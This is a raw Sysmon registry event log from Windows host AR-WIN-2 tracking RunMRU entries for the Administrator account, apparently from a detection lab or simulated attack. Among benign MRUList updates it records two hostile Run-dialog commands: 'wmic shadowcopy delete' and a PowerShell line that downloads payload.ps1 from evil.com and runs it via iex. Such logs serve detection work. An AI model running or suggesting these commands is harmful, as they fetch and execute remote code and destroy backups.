13241300x800000000000000026674Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-11-07 21:33:30.040{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUListcadbAR-WIN-2\Administrator 12241200x800000000000000026673Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:30.040{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x800000000000000026558Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:29.275{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x800000000000000026368Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:29.243{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 13241300x800000000000000025543Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-11-07 21:33:28.931{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUListadbcAR-WIN-2\Administrator 12241200x800000000000000025542Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:28.931{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x800000000000000025416Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:28.134{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x800000000000000025373Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:28.118{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 13241300x800000000000000024582Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-11-07 21:33:27.822{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUListdbcaAR-WIN-2\Administrator 13241300x800000000000000024581Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-11-07 21:33:27.822{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\dpowershell.exe -Command "Invoke-WebRequest http://evil.com/payload.ps1 -UseBasicParsing | iex"\1AR-WIN-2\Administrator 12241200x800000000000000024580Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:27.822{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x800000000000000024545Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:27.025{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x800000000000000024534Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:27.009{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 13241300x800000000000000023787Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-11-07 21:33:26.712{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUListbcaAR-WIN-2\Administrator 12241200x800000000000000023786Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:26.712{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x800000000000000023764Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:25.900{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x800000000000000023753Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:33:25.884{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 13241300x800000000000000019267Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-11-07 21:29:36.436{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUListcbaAR-WIN-2\Administrator 13241300x800000000000000019266Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-11-07 21:29:36.436{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\cwmic shadowcopy delete\1AR-WIN-2\Administrator 12241200x800000000000000019265Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:29:36.436{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x800000000000000019153Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:29:35.374{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x800000000000000019142Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:29:35.358{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 13241300x80000000000000007221Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-11-07 21:13:44.985{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUListbaAR-WIN-2\Administrator 12241200x80000000000000007220Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:13:44.985{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x80000000000000007174Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:13:44.172{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x80000000000000007162Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:13:44.141{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 13241300x80000000000000006092Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-11-07 21:13:32.968{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUListbaAR-WIN-2\Administrator 12241200x80000000000000006091Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:13:32.968{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x80000000000000005899Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:13:28.812{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator 12241200x80000000000000005889Microsoft-Windows-Sysmon/Operationalar-win-2-CreateKey2024-11-07 21:13:28.796{db960fe0-2c5c-672d-fd0a-000000002603}2356C:\Windows\Explorer.EXEHKU\S-1-5-21-2498987022-3172043200-3942101444-500\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUAR-WIN-2\Administrator